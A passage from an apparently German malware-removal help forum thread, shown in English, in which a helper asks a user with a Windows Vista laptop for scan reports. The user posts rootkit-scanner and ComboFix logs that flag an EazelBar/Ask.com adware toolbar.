UnsignedFile.Multi.Generic ) - warning 01:19:54.0640 5804 Updater Service for EazelBar - detected UnsignedFile.Multi.Generic (1) 01:19:54.0656 5804 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll 01:19:54.0796 5804 upnphost - ok 01:19:54.0843 5804 [ 8BF5D980CDCE35FB26F05047144BB57E ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys 01:19:54.0874 5804 USBAAPL - ok 01:19:54.0952 5804 [ A7CD5B4ADEA26765CAB06BDAB7B07B13 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys 01:19:54.0999 5804 usbccgp - ok 01:19:55.0030 5804 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys 01:19:55.0093 5804 usbcir - ok 01:19:55.0155 5804 [ 686D4188AE36254C3008B71FEDACADF3 ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys 01:19:55.0171 5804 usbehci - ok 01:19:55.0186 5804 [ 4E42F665A658F08D153F7FFFE7C83806 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys 01:19:55.0218 5804 usbhub - ok 01:19:55.0233 5804 [ D16C39CF6C1EC57614FBD8BD3EF2682D ] usbohci C:\Windows\system32\DRIVERS\usbohci.sys 01:19:55.0264 5804 usbohci - ok 01:19:55.0327 5804 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys 01:19:55.0358 5804 usbprint - ok 01:19:55.0389 5804 [ 87BA6B83C5D19B69160968D07D6E2982 
] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS 01:19:55.0436 5804 USBSTOR - ok 01:19:55.0467 5804 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys 01:19:55.0498 5804 usbuhci - ok 01:19:55.0576 5804 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys 01:19:55.0623 5804 usbvideo - ok 01:19:55.0670 5804 [ 032A0ACC3909AE7215D524E29D536797 ] UxSms C:\Windows\System32\uxsms.dll 01:19:55.0810 5804 UxSms - ok 01:19:55.0842 5804 [ B13BC395B9D6116628F5AF47E0802AC4 ] vds C:\Windows\System32\vds.exe 01:19:55.0982 5804 vds - ok 01:19:56.0076 5804 [ 87B06E1F30B749A114F74622D013F8D4 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys 01:19:56.0122 5804 vga - ok 01:19:56.0154 5804 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys 01:19:56.0216 5804 VgaSave - ok 01:19:56.0232 5804 [ 5D7159DEF58A800D5781BA3A879627BC ] viaagp C:\Windows\system32\drivers\viaagp.sys 01:19:56.0247 5804 viaagp - ok 01:19:56.0278 5804 [ C4F3A691B5BAD343E6249BD8C2D45DEE ] ViaC7 C:\Windows\system32\drivers\viac7.sys 01:19:56.0325 5804 ViaC7 - ok 01:19:56.0356 5804 [ AADF5587A4063F52C2C3FED7887426FC ] viaide C:\Windows\system32\drivers\viaide.sys 01:19:56.0388 5804 viaide - ok 01:19:56.0403 5804 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys 01:19:56.0434 5804 volmgr - ok 01:19:56.0450 5804 [ 98F5FFE6316BD74E9E2C97206C190196 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys 01:19:56.0481 5804 volmgrx - ok 01:19:56.0497 5804 [ D8B4A53DD2769F226B3EB374374987C9 ] volsnap C:\Windows\system32\drivers\volsnap.sys 01:19:56.0528 5804 volsnap - ok 01:19:56.0544 5804 [ 587253E09325E6BF226B299774B728A9 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys 01:19:56.0559 5804 vsmraid - ok 01:19:56.0606 5804 [ D5FB73D19C46ADE183F968E13F186B23 ] VSS C:\Windows\system32\vssvc.exe 01:19:56.0746 5804 VSS - ok 01:19:56.0778 5804 [ 1CF9206966A8458CDA9A8B20DF8AB7D3 ] W32Time 
C:\Windows\system32\w32time.dll 01:19:56.0871 5804 W32Time - ok 01:19:56.0918 5804 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys 01:19:56.0965 5804 WacomPen - ok 01:19:56.0980 5804 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys 01:19:57.0012 5804 Wanarp - ok 01:19:57.0027 5804 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys 01:19:57.0058 5804 Wanarpv6 - ok 01:19:57.0090 5804 [ F3A5C2E1A6533192B070D06ECF6BE796 ] wcncsvc C:\Windows\System32\wcncsvc.dll 01:19:57.0199 5804 wcncsvc - ok 01:19:57.0230 5804 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll 01:19:57.0339 5804 WcsPlugInService - ok 01:19:57.0386 5804 [ 78FE9542363F297B18C027B2D7E7C07F ] Wd C:\Windows\system32\drivers\wd.sys 01:19:57.0402 5804 Wd - ok 01:19:57.0448 5804 [ B6F0A7AD6D4BD325FBCD8BAC96CD8D96 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys 01:19:57.0480 5804 Wdf01000 - ok 01:19:57.0558 5804 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll 01:19:57.0714 5804 WdiServiceHost - ok 01:19:57.0714 5804 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll 01:19:57.0838 5804 WdiSystemHost - ok 01:19:57.0870 5804 [ CF9A5F41789B642DB967021DE06A2713 ] WebClient C:\Windows\System32\webclnt.dll 01:19:57.0948 5804 WebClient - ok 01:19:57.0994 5804 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll 01:19:58.0104 5804 Wecsvc - ok 01:19:58.0135 5804 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll 01:19:58.0244 5804 wercplsupport - ok 01:19:58.0260 5804 [ FD1965AAA112C6818A30AB02742D0461 ] WerSvc C:\Windows\System32\WerSvc.dll 01:19:58.0369 5804 WerSvc - ok 01:19:58.0431 5804 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll 01:19:58.0447 5804 WinDefend - ok 01:19:58.0462 5804 
WinHttpAutoProxySvc - ok 01:19:58.0509 5804 [ 00B79A7C984678F24CF052E5BEB3A2F5 ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll 01:19:58.0540 5804 Winmgmt - ok 01:19:58.0603 5804 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll 01:19:58.0743 5804 WinRM - ok 01:19:58.0821 5804 [ 275F4346E569DF56CFB95243BD6F6FF0 ] Wlansvc C:\Windows\System32\wlansvc.dll 01:19:58.0930 5804 Wlansvc - ok 01:19:58.0962 5804 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys 01:19:58.0993 5804 WmiAcpi - ok 01:19:59.0024 5804 [ ABA4CF9F856D9A3A25F4DDD7690A6E9D ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe 01:19:59.0071 5804 wmiApSrv - ok 01:19:59.0133 5804 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe 01:19:59.0258 5804 WMPNetworkSvc - ok 01:19:59.0336 5804 [ 5D94CD167751294962BA238D82DD1BB8 ] WPCSvc C:\Windows\System32\wpcsvc.dll 01:19:59.0523 5804 WPCSvc - ok 01:19:59.0586 5804 [ 396D406292B0CD26E3504FFE82784702 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll 01:19:59.0726 5804 WPDBusEnum - ok 01:19:59.0788 5804 [ 0CEC23084B51B8288099EB710224E955 ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys 01:19:59.0820 5804 WpdUsb - ok 01:19:59.0898 5804 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe 01:19:59.0976 5804 WPFFontCache_v0400 - ok 01:20:00.0069 5804 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys 01:20:00.0116 5804 ws2ifsl - ok 01:20:00.0147 5804 [ 683DD16B590372F2C9661D277F35E49C ] wscsvc C:\Windows\System32\wscsvc.dll 01:20:00.0272 5804 wscsvc - ok 01:20:00.0288 5804 WSearch - ok 01:20:00.0350 5804 [ D79538B67FA641E986855DEF651E78FE ] wuauserv C:\Windows\system32\wuaueng.dll 01:20:00.0568 5804 wuauserv - ok 01:20:00.0646 5804 [ AC13CB789D93412106B0FB6C7EB2BCB6 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys 01:20:00.0678 5804 WUDFRd - ok 01:20:00.0709 5804 
[ 575A4190D989F64732119E4114045A4F ] wudfsvc C:\Windows\System32\WUDFSvc.dll 01:20:00.0849 5804 wudfsvc - ok 01:20:00.0880 5804 [ 7D1F3B131D503EF43EE594B5A2B9B427 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys 01:20:00.0927 5804 yukonwlh - ok 01:20:00.0943 5804 ================ Scan global =============================== 01:20:00.0974 5804 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll 01:20:01.0005 5804 [ F42F8855CB5C22E203C6672B124F17FD ] C:\Windows\system32\winsrv.dll 01:20:01.0099 5804 [ F42F8855CB5C22E203C6672B124F17FD ] C:\Windows\system32\winsrv.dll 01:20:01.0192 5804 [ 2B336AB6286D6C81FA02CBAB914E3C6C ] C:\Windows\system32\services.exe 01:20:01.0255 5804 [Global] - ok 01:20:01.0255 5804 ================ Scan MBR ================================== 01:20:01.0270 5804 [ 64B1E91C5C6C2157642651010728F90F ] \Device\Harddisk0\DR0 01:20:01.0660 5804 \Device\Harddisk0\DR0 - ok 01:20:01.0660 5804 ================ Scan VBR ================================== 01:20:01.0660 5804 [ 0D067BF29C7DB9186A70435FDB0E981D ] \Device\Harddisk0\DR0\Partition1 01:20:01.0676 5804 \Device\Harddisk0\DR0\Partition1 - ok 01:20:01.0676 5804 ============================================================ 01:20:01.0676 5804 Scan finished 01:20:01.0676 5804 ============================================================ 01:20:01.0692 3516 Detected object count: 5 01:20:01.0692 3516 Actual detected object count: 5 |
03.03.2013, 20:19 | #10
/// Malware-holic | Of course you need that; all updates are important. Scan with Combofix
04.03.2013, 01:23 | #11
| Good evening, so after I started Combofix, nothing happened once the progress bars had finished. When I ran it a second time, a message came up saying it could not overwrite a certain file. I ignored it, and after that it was the same thing again: once the bars had loaded, nothing more happened. Regards. Edit: After that it did start; here is the log: Code:
ATTFilter ComboFix 13-03-03.01 - DBoy 04.03.2013 1:27.1.2 - x86 Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.49.1031.18.3070.1980 [GMT 1:00] ausgeführt von:: c:\users\DBoy\Desktop\ComboFix.exe AV: Avira Desktop *Disabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C} SP: Avira Desktop *Disabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691} SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} . . (((((((((((((((((((((((((((((((((((( Weitere Löschungen )))))))))))))))))))))))))))))))))))))))))))))))) . . C:\install.exe c:\program files\Common Files\ASPG_icon.ico c:\users\Public\sdelevURL.tmp . . ((((((((((((((((((((((( Dateien erstellt von 2013-02-04 bis 2013-03-04 )))))))))))))))))))))))))))))) . . 2013-03-04 00:40 . 2013-03-04 00:40 -------- d-----w- c:\users\Default\AppData\Local\temp 2013-03-03 23:09 . 2013-03-03 23:13 -------- d-----w- c:\windows\system32\ca-ES 2013-03-03 23:09 . 2013-03-03 23:12 -------- d-----w- c:\windows\system32\eu-ES 2013-03-03 23:09 . 2013-03-03 23:12 -------- d-----w- c:\windows\system32\vi-VN 2013-03-03 22:57 . 2013-03-03 22:57 -------- d-----w- c:\windows\system32\SPReview 2013-03-03 22:30 . 2009-04-10 22:28 928768 ----a-w- c:\windows\system32\scavenge.dll 2013-03-03 22:29 . 2009-04-10 22:27 57856 ----a-w- c:\windows\system32\compcln.exe 2013-03-03 22:25 . 2009-04-10 22:32 141288 ----a-w- c:\windows\system32\drivers\ecache.sys 2013-03-03 22:24 . 2009-04-10 22:28 75264 ----a-w- c:\windows\system32\adsmsext.dll 2013-03-03 22:23 . 2009-04-10 22:28 217600 ----a-w- c:\windows\system32\InkEd.dll 2013-03-03 22:22 . 2009-04-10 22:28 76288 ----a-w- c:\windows\system32\iassvcs.dll 2013-03-03 22:21 . 2009-04-10 22:32 17896 ----a-w- c:\windows\system32\kd1394.dll 2013-03-03 22:20 . 2009-04-10 22:32 53224 ----a-w- c:\windows\system32\drivers\termdd.sys 2013-03-03 22:20 . 2009-04-10 22:28 615424 ----a-w- c:\windows\system32\themeui.dll 2013-03-03 22:20 . 
2009-04-10 22:28 449024 ----a-w- c:\windows\system32\termsrv.dll 2013-03-03 22:20 . 2009-04-10 22:28 380416 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tiptsf.dll 2013-03-03 22:20 . 2009-04-10 22:28 313344 ----a-w- c:\windows\system32\thawbrkr.dll 2013-03-03 22:20 . 2009-04-10 22:28 242688 ----a-w- c:\windows\system32\tapisrv.dll 2013-03-03 22:20 . 2009-04-10 22:28 170496 ----a-w- c:\windows\system32\tcpipcfg.dll 2013-03-03 22:20 . 2009-04-10 22:28 1576960 ----a-w- c:\windows\system32\tquery.dll 2013-03-03 22:20 . 2009-04-10 22:28 135168 ----a-w- c:\windows\system32\tcpmon.dll 2013-03-03 22:20 . 2009-04-10 22:28 1305600 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tipskins.dll 2013-03-03 22:20 . 2009-04-10 22:28 1152000 ----a-w- c:\windows\system32\themecpl.dll 2013-03-03 22:20 . 2009-04-10 22:23 125952 ----a-w- c:\windows\system32\tintlgnt.ime 2013-03-03 22:20 . 2009-04-10 20:45 72192 ----a-w- c:\windows\system32\drivers\tdx.sys 2013-03-03 22:15 . 2013-03-03 22:15 -------- d-----w- c:\windows\system32\EventProviders 2013-03-02 21:58 . 2013-03-02 22:18 -------- d-----w- c:\users\DBoy\AppData\Roaming\DocFetcher 2013-03-02 21:57 . 2013-03-02 21:57 -------- d-----w- c:\program files\DocFetcher 2013-03-02 21:57 . 2013-03-02 21:57 -------- d-----w- c:\program files\Common Files\Java 2013-03-02 21:56 . 2013-03-02 21:55 472808 ----a-w- c:\windows\system32\deployJava1.dll 2013-03-02 21:55 . 2013-03-02 21:55 -------- d-----w- c:\program files\Java 2013-03-02 18:53 . 2013-03-02 18:53 -------- d-----w- c:\users\DBoy\AppData\Roaming\Malwarebytes 2013-03-02 18:53 . 2013-03-02 18:53 -------- d-----w- c:\programdata\Malwarebytes 2013-03-02 18:53 . 2013-03-02 18:53 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware 2013-03-02 18:53 . 2012-12-14 15:49 21104 ----a-w- c:\windows\system32\drivers\mbam.sys 2013-03-02 12:30 . 2013-03-02 12:30 -------- d-----w- c:\users\DBoy\AppData\Roaming\OpenOffice.org 2013-03-02 12:27 . 
2013-03-02 12:27 -------- d-----w- c:\program files\OpenOffice.org 3 2013-02-28 17:42 . 2011-06-21 10:24 32768 ----a-w- c:\windows\system32\drivers\sp_rsdrv2.sys 2013-02-22 14:07 . 2013-02-22 14:07 -------- d-----w- c:\program files\TeamViewer 2013-02-19 23:21 . 2013-02-20 14:33 -------- d-----w- c:\program files\Mozilla Thunderbird 2013-02-03 14:04 . 2013-02-03 14:04 -------- d-----w- c:\program files\MSXML 4.0 2013-02-03 13:49 . 2009-02-19 08:50 483328 ----a-w- c:\windows\ssndii.exe 2013-02-03 13:49 . 2008-03-11 20:10 82432 ----a-w- c:\windows\system32\msxml4r.dll 2013-02-03 13:49 . 2008-03-11 20:10 44544 ----a-w- c:\windows\system32\msxml4a.dll 2013-02-03 13:49 . 2008-03-11 20:10 38160 ----a-w- c:\windows\system32\msxml2r.dll 2013-02-03 13:49 . 2008-03-11 20:10 701440 ----a-w- c:\windows\system32\msxml2.dll 2013-02-03 13:49 . 2008-03-11 20:10 21776 ----a-w- c:\windows\system32\msxml2a.dll 2013-02-03 13:49 . 2007-06-27 08:56 19968 ----a-w- c:\windows\system32\Spool\prtprocs\w32x86\spd__pc.dll 2013-02-03 13:46 . 2009-03-24 08:46 137384 ----a-w- c:\windows\system32\SUPDSvcA.dll 2013-02-03 13:46 . 2009-03-24 08:45 127656 ----a-w- c:\windows\system32\SUPDSvc.exe 2013-02-03 13:46 . 2009-03-24 07:55 217600 ----a-w- c:\windows\system32\SIPDUtil.dll 2013-02-03 13:46 . 2008-06-04 14:53 26624 ----a-w- c:\windows\system32\spd__l3.dll 2013-02-03 13:46 . 2009-03-02 13:45 339968 ----a-w- c:\windows\system32\DscPnt1.dll 2013-02-03 13:46 . 2009-03-01 09:55 229376 ----a-w- c:\windows\system32\DscPnt.dll 2013-02-03 13:46 . 2009-03-01 09:55 233472 ----a-w- c:\windows\system32\DscPnt0.dll 2013-02-03 13:46 . 2007-10-02 18:21 151552 ----a-w- c:\windows\system32\spd__ci.exe 2013-02-03 13:46 . 2007-10-02 18:21 65536 ----a-w- c:\windows\system32\spd__ci.dll 2013-02-03 13:46 . 2008-11-10 14:00 5120 ------w- c:\windows\system32\drivers\SSPORT.SYS 2013-02-03 13:46 . 2013-02-03 13:46 -------- d-----w- c:\program files\Samsung 2013-02-03 13:46 . 
2013-02-03 13:46 -------- d-----w- C:\Temp 2013-02-03 13:41 . 2013-02-03 13:41 -------- d-----w- c:\program files\Common Files\SWF Studio 2013-02-03 13:40 . 2013-02-03 13:49 -------- d-----w- c:\windows\Samsung 2013-02-03 13:39 . 2013-02-03 13:39 -------- d-----w- c:\program files\EazelBar . . . (((((((((((((((((((((((((((((((((((( Find3M Bericht )))))))))))))))))))))))))))))))))))))))))))))))))))))) . 2013-02-27 17:13 . 2012-11-12 17:31 71024 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl 2013-02-27 17:13 . 2012-11-12 17:31 691568 ----a-w- c:\windows\system32\FlashPlayerApp.exe 2012-12-26 15:20 . 2012-11-12 04:20 230796401 ----a-w- c:\windows\DUMP32e2.tmp 2012-12-26 15:01 . 2012-11-12 04:20 165376913 ----a-w- c:\windows\DUMP3265.tmp 2012-12-12 18:02 . 2012-11-12 17:00 83944 ----a-w- c:\windows\system32\drivers\avgntflt.sys 2012-12-12 18:02 . 2012-11-12 17:00 134336 ----a-w- c:\windows\system32\drivers\avipbb.sys 2008-07-02 03:28 . 2008-07-02 03:28 61440 ----a-w- c:\program files\Common Files\CPInstallAction.dll 2013-02-20 15:20 . 2013-02-20 15:20 263064 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll . . (((((((((((((((((((((((((((( Autostartpunkte der Registrierung )))))))))))))))))))))))))))))))))))))))) . . *Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. REGEDIT4 . [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks] "{00000000-6E41-4FD3-8538-502F5495E5FC}"= "c:\program files\Ask.com\GenericAskToolbar.dll" [2012-10-29 1521872] . [HKEY_CLASSES_ROOT\clsid\{00000000-6e41-4fd3-8538-502f5495e5fc}] . [HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{FE478DC2-E4AD-4197-8F80-5E456BEBC57F}] 2012-06-13 12:31 492032 ----a-w- c:\program files\EazelBar\Toolbar32.dll . [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar] "{EBD839AE-B08C-4fb7-859B-F54AF16C159F}"= "c:\program files\EazelBar\Toolbar32.dll" [2012-06-13 492032] . 
[HKEY_CLASSES_ROOT\clsid\{ebd839ae-b08c-4fb7-859b-f54af16c159f}] . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ADSMOverlayIcon1] @="{A8D448F4-0431-45AC-9F5E-E1B434AB2249}" [HKEY_CLASSES_ROOT\CLSID\{A8D448F4-0431-45AC-9F5E-E1B434AB2249}] 2007-06-02 01:08 143360 ----a-w- c:\program files\ASUS\ASUS Data Security Manager\OverlayIconShlExt1.dll . [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-10 1233920] . [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-08-30 61440] "ATKOSD2"="c:\program files\ASUS\ATKOSD2\ATKOSD2.exe" [2008-07-15 7651328] "RtHDVCpl"="RtHDVCpl.exe" [2008-07-16 6253088] "SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2007-12-06 1029416] "ADSMTray"="c:\program files\ASUS\ASUS Data Security Manager\ADSMTray.exe" [2008-04-01 266240] "ATKMEDIA"="c:\program files\ASUS\ATK Media\DMedia.exe" [2008-06-25 159744] "ASUSTPE"="c:\windows\system32\ASUSTPE.exe" [2007-10-12 106496] "ASUS Camera ScreenSaver"="c:\windows\AsScrProlog.exe" [2012-11-12 47672] "ASUS Screen Saver Protector"="c:\windows\ASScrPro.exe" [2012-11-12 33136] "ApnUpdater"="c:\program files\Ask.com\Updater\Updater.exe" [2012-10-29 1573584] "avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2013-02-12 385248] "APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-11-28 59280] "iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-12-12 152544] "Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2012-07-27 919008] "Samsung PanelMgr"="c:\windows\Samsung\PanelMgr\SSMMgr.exe" [2009-02-04 548864] "SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2011-06-09 254696] "Skytel"="Skytel.exe" [2008-07-16 1833504] . 
c:\users\DBoy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OpenOffice.org 3.4.1.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2012-8-13 1199104] . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system] "EnableUIADesktopToggle"= 0 (0x0) . [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa] Notification Packages REG_MULTI_SZ scecli c:\program files\ASUS\ASUS Data Security Manager\ASPWDFLT . [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring] "DisableMonitoring"=dword:00000001 . [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus] "DisableMonitoring"=dword:00000001 . [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall] "DisableMonitoring"=dword:00000001 . [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost] bthsvcs REG_MULTI_SZ BthServ . Inhalt des "geplante Tasks" Ordners . 2013-03-04 c:\windows\Tasks\Adobe Flash Player Updater.job - c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-11-12 17:13] . 2013-03-03 c:\windows\Tasks\User_Feed_Synchronization-{DA6E10C5-8C26-4239-930B-F93C091E7ABE}.job - c:\windows\system32\msfeedssync.exe [2008-01-21 02:24] . . ------- Zusätzlicher Suchlauf ------- . 
uStart Page = hxxp://search.eazel.com?id=A8753F0C2B594A0DB594C667F621AFEB uInternet Settings,ProxyOverride = *.local IE: Free YouTube to MP3 Converter - c:\users\DBoy\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm LSP: c:\program files\Avira\AntiVir Desktop\avsda.dll TCP: DhcpNameServer = 192.168.0.1 FF - ProfilePath - c:\users\DBoy\AppData\Roaming\Mozilla\Firefox\Profiles\v1trl7q1.default\ FF - prefs.js: browser.search.selectedEngine - Ask.com FF - prefs.js: keyword.URL - hxxp://websearch.ask.com/redirect?client=ff&src=kw&tb=AVR-4&o=APN10261&locale=de_DE&apn_uid=5f7fec2e-bd4e-466c-ac24-ea30a8c3d0b3&apn_ptnrs=%5EAGS&apn_sauid=83ED2D56-BCA8-425D-A144-8DEF5DA8B8C7&apn_dtid=%5EYYYYYY%5EYY%5EDE&&q= FF - ExtSQL: 2013-02-04 12:26; {EBD839AE-B08C-4fb7-859B-F54AF16C159F}; c:\program files\EazelBar\Firefox FF - ExtSQL: 2013-03-02 22:56; {CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA}; c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA} . - - - - Entfernte verwaiste Registrierungseinträge - - - - . URLSearchHooks-{16CC3586-3547-4025-9E2F-F04C365D8B90} - (no file) HKCU-Run-DocFetcher-Daemon - c:\program files\DocFetcher\docfetcher-daemon-win.exe HKLM-Run-Zshutdown - c:\preload\patch\sysprep.cmd . . . ************************************************************************** . catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, hxxp://www.gmer.net Rootkit scan 2013-03-04 01:41 Windows 6.0.6002 Service Pack 2 NTFS . Scanne versteckte Prozesse... . Scanne versteckte Autostarteinträge... . Scanne versteckte Dateien... . . C:\ADSM_PData_0150 . Scan erfolgreich abgeschlossen versteckte Dateien: 1 . ************************************************************************** . --------------------- Durch laufende Prozesse gestartete DLLs --------------------- . - - - - - - - > 'lsass.exe'(656) c:\program files\ASUS\ASUS Data Security Manager\ASPWDFLT.dll . 
Zeit der Fertigstellung: 2013-03-04 01:44:47 ComboFix-quarantined-files.txt 2013-03-04 00:44 . Vor Suchlauf: 7 Verzeichnis(se), 194.249.220.096 Bytes frei Nach Suchlauf: 10 Verzeichnis(se), 193.986.506.752 Bytes frei . - - End Of File - - 3E29E200BDB6DA603B99D3C5759DACF6
04.03.2013, 17:45 | #12
/// Malware-holic | Why was Malwarebytes installed, and where are the reports? http://www.trojaner-board.de/125889-...en-posten.html
04.03.2013, 22:23 | #13
| Hi, my buddy installed it and let it run because he was so convinced by it. But it only found the keylogger. Combofix only showed me the file, no findings. Regards
05.03.2013, 14:53 | #14
/// Malware-holic | And where is the report?
05.03.2013, 20:54 | #15
| The one above is the Combofix.txt file; I didn't find anything else.